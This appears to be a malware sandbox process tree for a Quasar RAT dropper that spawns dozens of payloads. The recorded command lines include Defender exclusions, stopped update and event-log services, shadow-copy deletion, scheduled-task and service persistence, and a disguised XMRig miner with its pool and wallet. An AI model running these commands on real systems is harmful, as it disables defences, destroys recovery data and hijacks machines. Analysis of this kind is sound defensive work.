C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1372

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1444
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1996

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2536

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:692

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2484

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3308
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2568
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Quasar RAT
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:880
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3572
  - - C:\Users\Admin\Desktop\a\Client-base.exe
      "C:\Users\Admin\Desktop\a\Client-base.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4076
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2404
  - - C:\Users\Admin\Desktop\a\build.exe
      "C:\Users\Admin\Desktop\a\build.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3716
  - - C:\Users\Admin\Desktop\a\cbot.exe
      "C:\Users\Admin\Desktop\a\cbot.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      PID:1972
  - - C:\Users\Admin\Desktop\a\Client.exe
      "C:\Users\Admin\Desktop\a\Client.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2252
  - - C:\Users\Admin\Desktop\a\svhost.exe
      "C:\Users\Admin\Desktop\a\svhost.exe"
      4⤵
      Executes dropped EXE
      PID:6064
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6708
  - - C:\Users\Admin\Desktop\a\mimikatz.exe
      "C:\Users\Admin\Desktop\a\mimikatz.exe"
      4⤵
      PID:3744
  - - C:\Users\Admin\Desktop\a\123.exe
      "C:\Users\Admin\Desktop\a\123.exe"
      4⤵
      PID:4648
  - - C:\Users\Admin\Desktop\a\xmrig.exe
      "C:\Users\Admin\Desktop\a\xmrig.exe"
      4⤵
      PID:7096
  - - C:\Users\Admin\Desktop\a\chrtrome22.exe
      "C:\Users\Admin\Desktop\a\chrtrome22.exe"
      4⤵
      PID:7080
    - - C:\xmrig\xmrig-6.22.2\xmrig.exe
        
        "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
        5⤵
        
        PID:5464
  - - C:\Users\Admin\Desktop\a\Fixer.exe
      "C:\Users\Admin\Desktop\a\Fixer.exe"
      4⤵
      PID:7160
  - - C:\Users\Admin\Desktop\a\Client-built.exe
      "C:\Users\Admin\Desktop\a\Client-built.exe"
      4⤵
      PID:5848
    - - C:\Users\Admin\Desktop\a\._cache_Client-built.exe
        
        "C:\Users\Admin\Desktop\a\._cache_Client-built.exe"
        5⤵
        
        PID:4784
      - C:\Users\Admin\Desktop\a\a\Client-base.exe
        
        "C:\Users\Admin\Desktop\a\a\Client-base.exe"
        6⤵
        
        PID:2984
      - C:\Users\Admin\Desktop\a\a\voidware_loader.exe
        
        "C:\Users\Admin\Desktop\a\a\voidware_loader.exe"
        6⤵
        
        PID:6904
      - C:\Users\Admin\Desktop\a\a\build.exe
        
        "C:\Users\Admin\Desktop\a\a\build.exe"
        6⤵
        
        PID:8
      - C:\Users\Admin\Desktop\a\a\gem2.exe
        
        "C:\Users\Admin\Desktop\a\a\gem2.exe"
        6⤵
        
        PID:2512
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:2132
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:1588
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:4536
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:1296
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:1940
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:3240
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:2652
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        
        PID:4548
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        
        PID:5412
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        
        PID:4960
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        
        PID:6336
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        7⤵
        
        PID:3836
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:6516
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GeekBrains"
        7⤵
        Launches sc.exe
        
        PID:3560
      - C:\Users\Admin\Desktop\a\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\a\gem1.exe"
        6⤵
        
        PID:5412
        
        C:\Users\Admin\Desktop\a\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\a\gem1.exe"
        7⤵
        
        PID:6436
        
        C:\Users\Admin\Desktop\a\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\a\gem1.exe"
        7⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 820
        7⤵
        Program crash
        
        PID:344
  - - C:\Users\Admin\Desktop\a\Steanings.exe
      "C:\Users\Admin\Desktop\a\Steanings.exe"
      4⤵
      PID:1144
  - - C:\Users\Admin\Desktop\a\Crawl.exe
      "C:\Users\Admin\Desktop\a\Crawl.exe"
      4⤵
      PID:4564
    - - \??\c:\Windows\system32\wbem\wmic.exe
        
        c:\oMZCKU\oMZC\..\..\Windows\oMZC\oMZC\..\..\system32\oMZC\oMZC\..\..\wbem\oMZC\oMZCK\..\..\wmic.exe shadowcopy delete
        5⤵
        
        PID:460
    - - \??\c:\Windows\system32\wbem\wmic.exe
        
        c:\vRcPpF\vRcP\..\..\Windows\vRcP\vRcP\..\..\system32\vRcP\vRcP\..\..\wbem\vRcP\vRcPp\..\..\wmic.exe shadowcopy delete
        5⤵
        
        PID:5104
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3328
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4212
  - - C:\Users\Admin\Desktop\a\sela.exe
      "C:\Users\Admin\Desktop\a\sela.exe"
      4⤵
      PID:4460
  - - C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe
      "C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"
      4⤵
      PID:3012
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6524
  - - C:\Users\Admin\Desktop\a\albt.exe
      "C:\Users\Admin\Desktop\a\albt.exe"
      4⤵
      PID:300
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "
        5⤵
        
        PID:5972
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
        5⤵
        
        PID:6940
    - - C:\Users\Public\Libraries\npratlsN.pif
        
        C:\Users\Public\Libraries\npratlsN.pif
        5⤵
        
        PID:4068
  - - C:\Users\Admin\Desktop\a\drop2.exe
      "C:\Users\Admin\Desktop\a\drop2.exe"
      4⤵
      PID:2076
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6420
    - - C:\Windows\SYSTEM32\SCHTASKS.exe
        
        SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6404
    - - C:\Windows\System32\svchost.exe
        
        C:\Windows\System32\svchost.exe
        5⤵
        
        PID:5616
      - C:\Windows\System32\powercfg.exe
        
        powercfg -change standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:6260
      - C:\Windows\System32\powercfg.exe
        
        powercfg -change monitor-timeout-ac 0
        6⤵
        Power Settings
        
        PID:4536
      - C:\Windows\System32\powercfg.exe
        
        powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
        6⤵
        Power Settings
        
        PID:1800
      - C:\Windows\System32\powercfg.exe
        
        powercfg /setactive SCHEME_CURRENT
        6⤵
        Power Settings
        
        PID:3712
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:5832
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:7264
      - C:\Windows\System32\curl.exe
        
        curl -s https://api.ipify.org
        6⤵
        
        PID:7564
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic diskdrive get serialnumber
        6⤵
        
        PID:7776
      - C:\Windows\System32\svchost.exe
        
        "C:\Windows\System32\svchost.exe" --algo rx/0 --url pool.supportxmr.com:8080 --user 46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw/lunarig --cpu-max-threads-hint=30
        6⤵
        
        PID:7984
      - C:\Windows\System32\curl.exe
        
        curl -s http://ipinfo.io/country
        6⤵
        
        PID:8040
      - C:\Windows\System32\svchost.exe
        
        "C:\Windows\System32\svchost.exe" --algo rx/0 --url pool.supportxmr.com:8080 --user 46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw/lunarig --cpu-max-threads-hint=80
        6⤵
        
        PID:1696
    - - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\SysWOW64\explorer.exe"
        5⤵
        
        PID:2356
  - - C:\Users\Admin\Desktop\a\drop1.exe
      "C:\Users\Admin\Desktop\a\drop1.exe"
      4⤵
      PID:4916
    - - C:\Users\Admin\Desktop\a\drop1.exe
        
        "C:\Users\Admin\Desktop\a\drop1.exe"
        5⤵
        
        PID:5616
  - - C:\Users\Admin\Desktop\a\01.exe
      "C:\Users\Admin\Desktop\a\01.exe"
      4⤵
      PID:6948
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 352
        5⤵
        Program crash
        
        PID:6672
  - - C:\Users\Admin\Desktop\a\wudi.exe
      "C:\Users\Admin\Desktop\a\wudi.exe"
      4⤵
      PID:3092
  - - C:\Users\Admin\Desktop\a\00.exe
      "C:\Users\Admin\Desktop\a\00.exe"
      4⤵
      PID:6676
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 352
        5⤵
        Program crash
        
        PID:5456
  - - C:\Users\Admin\Desktop\a\64.exe
      "C:\Users\Admin\Desktop\a\64.exe"
      4⤵
      PID:6208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c color 0a
        5⤵
        
        PID:5580
  - - C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe
      "C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"
      4⤵
      PID:720
    - - C:\Users\Admin\AppData\Local\Temp\is-2PADL.tmp\Kerish_Doctor_2022.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2PADL.tmp\Kerish_Doctor_2022.tmp" /SL5="$A0536,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"
        5⤵
        
        PID:6128
  - - C:\Users\Admin\Desktop\a\Kerish_Doctor.exe
      "C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"
      4⤵
      PID:6164
    - - C:\Users\Admin\AppData\Local\Temp\is-MQ93T.tmp\Kerish_Doctor.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MQ93T.tmp\Kerish_Doctor.tmp" /SL5="$203C0,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"
        5⤵
        
        PID:6936
  - - C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows.exe
      "C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows.exe"
      4⤵
      PID:8960
    - - C:\Users\Admin\AppData\Local\Temp\is-H3QES.tmp\Kerish_Doctor_Windows.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-H3QES.tmp\Kerish_Doctor_Windows.tmp" /SL5="$105F8,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows.exe"
        5⤵
        
        PID:9112
  - - C:\Users\Admin\Desktop\a\BootstrapperNew.exe
      "C:\Users\Admin\Desktop\a\BootstrapperNew.exe"
      4⤵
      PID:6016
  - - C:\Users\Admin\Desktop\a\prueba.exe
      "C:\Users\Admin\Desktop\a\prueba.exe"
      4⤵
      PID:5980
  - - C:\Users\Admin\Desktop\a\evetbeta.exe
      "C:\Users\Admin\Desktop\a\evetbeta.exe"
      4⤵
      PID:7144
  - - C:\Users\Admin\Desktop\a\benpolatalemdar.exe
      "C:\Users\Admin\Desktop\a\benpolatalemdar.exe"
      4⤵
      PID:3792
    - - C:\Users\Admin\Desktop\a\._cache_benpolatalemdar.exe
        
        "C:\Users\Admin\Desktop\a\._cache_benpolatalemdar.exe"
        5⤵
        
        PID:8672
  - - C:\Users\Admin\Desktop\a\NOTallowedtocrypt.exe
      "C:\Users\Admin\Desktop\a\NOTallowedtocrypt.exe"
      4⤵
      PID:6208
    - - C:\Users\Admin\Desktop\a\._cache_NOTallowedtocrypt.exe
        
        "C:\Users\Admin\Desktop\a\._cache_NOTallowedtocrypt.exe"
        5⤵
        
        PID:8628
  - - C:\Users\Admin\Desktop\a\testingg.exe
      "C:\Users\Admin\Desktop\a\testingg.exe"
      4⤵
      PID:2260
    - - C:\Users\Admin\AppData\Roaming\server.exe
        
        "C:\Users\Admin\AppData\Roaming\server.exe"
        5⤵
        
        PID:3848
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:6432
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
        6⤵
        Modifies Windows Firewall
        
        PID:9172
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:2260
  - - C:\Users\Admin\Desktop\a\Server.exe
      "C:\Users\Admin\Desktop\a\Server.exe"
      4⤵
      PID:8188
    - - C:\Users\Admin\Desktop\a\._cache_Server.exe
        
        "C:\Users\Admin\Desktop\a\._cache_Server.exe"
        5⤵
        
        PID:7036
  - - C:\Users\Admin\Desktop\a\mcgen.exe
      "C:\Users\Admin\Desktop\a\mcgen.exe"
      4⤵
      PID:8460
  - - C:\Users\Admin\Desktop\a\diskutil.exe
      "C:\Users\Admin\Desktop\a\diskutil.exe"
      4⤵
      PID:7100
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5672
  - - C:\Users\Admin\Desktop\a\Gorebox%20ModMenu%201.2.0.exe
      "C:\Users\Admin\Desktop\a\Gorebox%20ModMenu%201.2.0.exe"
      4⤵
      PID:7420
  - - C:\Users\Admin\Desktop\a\ytjgjdrthjdw.exe
      "C:\Users\Admin\Desktop\a\ytjgjdrthjdw.exe"
      4⤵
      PID:8956
  - - C:\Users\Admin\Desktop\a\toolwin.exe
      "C:\Users\Admin\Desktop\a\toolwin.exe"
      4⤵
      PID:8668
  - - C:\Users\Admin\Desktop\a\Sync.exe
      "C:\Users\Admin\Desktop\a\Sync.exe"
      4⤵
      PID:6632
  - - C:\Users\Admin\Desktop\a\mode11_N1Fz.exe
      "C:\Users\Admin\Desktop\a\mode11_N1Fz.exe"
      4⤵
      PID:7960
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Users\Admin\Desktop\._cache_Synaptics.exe
      "C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3080
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5044
    - - C:\Users\Admin\Desktop\a\voidware_loader.exe
        
        "C:\Users\Admin\Desktop\a\voidware_loader.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3704
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1516
      - C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3288
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2144
    - - C:\Users\Admin\Desktop\a\gem2.exe
        
        "C:\Users\Admin\Desktop\a\gem2.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4972
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5880
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:6092
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1252
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:6100
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:2820
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4068
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1672
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:1036
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:616
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5176
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5184
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5192
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5200
      - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5228
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GeekBrains"
        6⤵
        Launches sc.exe
        
        PID:5284
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:4072
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:5440
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GeekBrains"
        6⤵
        Launches sc.exe
        
        PID:5460
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5476
    - - C:\Users\Admin\Desktop\a\AsyncClientGK.exe
        
        "C:\Users\Admin\Desktop\a\AsyncClientGK.exe"
        5⤵
        
        PID:6200
    - - C:\Users\Admin\Desktop\a\RuntimeBroker.exe
        
        "C:\Users\Admin\Desktop\a\RuntimeBroker.exe"
        5⤵
        
        PID:5164
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3900
      - C:\Windows\system32\a7\RuntimeBroker.exe
        
        "C:\Windows\system32\a7\RuntimeBroker.exe"
        6⤵
        
        PID:6696
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6996
    - - C:\Users\Admin\Desktop\a\uu.exe
        
        "C:\Users\Admin\Desktop\a\uu.exe"
        5⤵
        
        PID:7008
    - - C:\Users\Admin\Desktop\a\02.exe
        
        "C:\Users\Admin\Desktop\a\02.exe"
        5⤵
        
        PID:5960
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 352
        6⤵
        Program crash
        
        PID:5660
    - - C:\Users\Admin\Desktop\a\32.exe
        
        "C:\Users\Admin\Desktop\a\32.exe"
        5⤵
        
        PID:6692
      - C:\Users\Admin\Desktop\a\._cache_32.exe
        
        "C:\Users\Admin\Desktop\a\._cache_32.exe"
        6⤵
        
        PID:2084
    - - C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe
        
        "C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"
        5⤵
        
        PID:6468
    - - C:\Users\Admin\Desktop\a\IMG001.exe
        
        "C:\Users\Admin\Desktop\a\IMG001.exe"
        5⤵
        
